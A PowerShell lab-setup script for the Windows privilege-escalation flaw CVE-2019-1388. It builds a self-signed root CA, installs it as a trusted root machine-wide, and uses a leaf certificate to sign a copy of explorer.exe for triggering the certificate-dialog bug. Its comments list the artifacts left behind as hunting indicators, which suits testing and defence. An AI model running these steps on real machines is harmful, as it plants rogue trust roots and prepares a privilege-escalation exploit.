Created
November 25, 2019 22:08
CVE-2019-1388
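<#
Lab setup script for CVE-2019-1388: builds a throwaway two-level certificate
chain (self-signed root CA -> code-signing leaf) and uses the leaf to
Authenticode-sign a copy of explorer.exe saved as .\runme.exe.

NOTE(review): CVE-2019-1388 is, as far as I know, the Windows Certificate
Dialog elevation-of-privilege issue addressed by Microsoft's November 2019
security updates. Confirm against the vendor advisory and check the patch
level of any host this is tested on.

Requirements visible from the commands below:
  - makecert.exe and pvk2pfx.exe from the Windows SDK (the SDK path is
    hard-coded to build 10.0.18362.0 and must match the local install).
  - Permission to write to the LocalMachine Root store (normally an elevated
    session), so this is presumably meant for a dedicated test machine.
  - Outbound HTTP to the timestamp server named in the last command.

Artifacts left behind (remove them after testing, and treat them as
indicators when hunting for this technique):
  - root.pvk, root.cer, codeSigner.pvk, codeSigner.cer, codeSigner.pfx and
    runme.exe on the user's Desktop. The .pvk/.pfx files hold private keys.
  - "CN=root ca" in Cert:\LocalMachine\Root and Cert:\CurrentUser\Root.
    While that root stays trusted, anything signed with the exported keys is
    trusted on this machine.
  - "CN=code signer" with an exportable private key in Cert:\CurrentUser\My.
  - Both certificates use SHA-1 (-a sha1), which is deprecated for signing.
#>

# Work from a directory the current user can write to; every relative path
# below (key files, certificates, runme.exe) lands here.
cd $env:USERPROFILE\desktop

# Make the Windows SDK signing tools (makecert, pvk2pfx) resolvable.
# The version segment is specific to the installed SDK.
$env:Path="$env:Path;C:\Program Files (x86)\Windows Kits\10\bin\10.0.18362.0\x64\"

# Create the self-signed (-r) root CA. -sv writes the private key to root.pvk,
# -ss Root -sr localMachine also installs the certificate as a trusted root
# machine-wide, and -eku 1.3.6.1.5.5.7.3.3 is the Code Signing usage.
# -l embeds a policy-information URL in the certificate; that embedded link
# is presumably the field this CVE test depends on, so keep it pointed at a
# benign page.
makecert -n "CN=root ca" -a sha1 -eku 1.3.6.1.5.5.7.3.3 -r -sv root.pvk root.cer -ss Root -sr localMachine -l https://www.zerodayinitiative.com/blog/

# Issue the code-signing leaf under that root (-iv/-ic name the issuer key and
# certificate). -pe marks the private key exportable; -ss MY stores the leaf
# in the personal store.
makecert -pe -n "CN=code signer" -ss MY -a sha1 -eku 1.3.6.1.5.5.7.3.3 -iv root.pvk -ic root.cer -sv codeSigner.pvk codeSigner.cer

# Bundle the leaf certificate and its private key into one PFX container.
pvk2pfx -pvk codeSigner.pvk -spc codeSigner.cer -pfx codeSigner.pfx

# Import the PFX for the current user and keep the returned certificate object
# for the signing step.
$codeSigner = Import-PfxCertificate -Exportable -CertStoreLocation Cert:\CurrentUser\My\ -FilePath .\codeSigner.pfx

# Trust the root CA for the current user as well.
Import-Certificate -FilePath .\root.cer -CertStoreLocation Cert:\CurrentUser\Root\

# Take a private copy of an existing binary; signing rewrites the file, so the
# original under C:\windows is never touched.
cp C:\windows\explorer.exe .\runme.exe

# Sign the copy with the leaf certificate, embedding the full chain
# (-IncludeChain "all") and a timestamp from the external server. -Force
# overwrites the file's existing signature.
Set-AuthenticodeSignature -FilePath .\runme.exe -Certificate $codeSigner -IncludeChain "all" -TimestampServer http://timestamp.digicert.com -Force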